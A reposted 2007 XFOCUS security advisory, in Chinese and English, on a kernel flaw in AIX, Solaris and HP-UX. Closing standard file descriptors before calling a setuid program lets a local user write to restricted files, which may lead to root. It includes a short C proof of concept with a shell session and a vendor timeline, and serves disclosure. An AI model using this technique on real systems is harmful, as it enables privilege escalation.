首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
[xfocus-SD-070118]多个操作系统内核不安全方式处理标准IO漏洞
来源:http://www.xfocus.org 作者:XFOCUS 发布时间:2007-01-22  

XFOCUS team (http://www.xfocus.org/) 发现多个操作系统内核以不安全方式处理标准IO文件描述符的漏洞。

===================
Affected OS Version

AIX 5.3
Solaris 9
HPUX B11.11
(maybe other version,we did not tested)

===========
Description

被影响的操作系统允许本地用户先通过关闭fd 0,1,2然后调用setuid进程来非法读写限制的文件,进一步有可能导致获得root权限。

The affected OSes allows local users to write to or read from restricted
files by closing the file descriptors 0 (standard input), 1 (standard
output), or 2 (standard error), which may then be reused by a called
setuid process that intended to perform I/O on normal files. the attack
which exploit this vulnerability possibly get root right.

====
POC

-bash-3.00$ oslevel -r
5300-03
-bash-3.00$ ls -l bb
-rw-r--r-- 1 root system 0 12月05 20时34 bb
-bash-3.00$ ls -l k
-rwxr-xr-x 1 root system 58242 12月03 23时13 k
-bash-3.00$ ls -l tt
-rwsr-xr-x 1 root system 59096 12月03 23时14 tt (this is a
suid program,called by k)
-bash-3.00$ cat k.c
int main()
{
close(2); //close 2 before call tt
execl("./tt","./tt",0);
}
-bash-3.00$ cat tt.c
int main()
{

printf("euid=%i\n",geteuid());
int f=open("/tmp/bb",1);
printf("f=%i\n",f);
write(2,"hello\n",6);
}

-bash-3.00$ id
uid=202(cloud) gid=1(staff)
-bash-3.00$ ./k
euid=0
f=2 #err info wrote into bb file
-bash-3.00$ ls -l bb
-rw-r--r-- 1 root system 6 12月05 20时35 bb

=========
Time Line
2005-12-xx Discover this vulnerability
2006-12-12 Initial vendor notifiation
2006-12-12 HP responses ,assgin to SSRT061287;
Sun responses but mistake this vulnerablitily as
application bug and hope us figoure out real attack
vector;
Aix no responses;
2007-01-18 public disclosure

--EOF


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·Wu-ftpd S/key验证缓冲区溢出漏
·阿里巴巴淘宝旺旺ActiveX远程栈
·WordPress wp-trackback.php漏洞
·Microsoft MSN Messenger远程信
·Microsoft Outlook Mailto参数引
·新浪UC ActiveX多个远程栈溢出漏
·Microsoft Windows Media Servic
·ICQ Toolbar 1.3 for IE多个安全
·Norton AntiVirus 2002 ASCII嵌
·Backdoor.Win32.IRCBot.st 蠕虫
·Php5 GPC绕过缺陷
·Sun Solaris 嵌入passwd命令安全
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved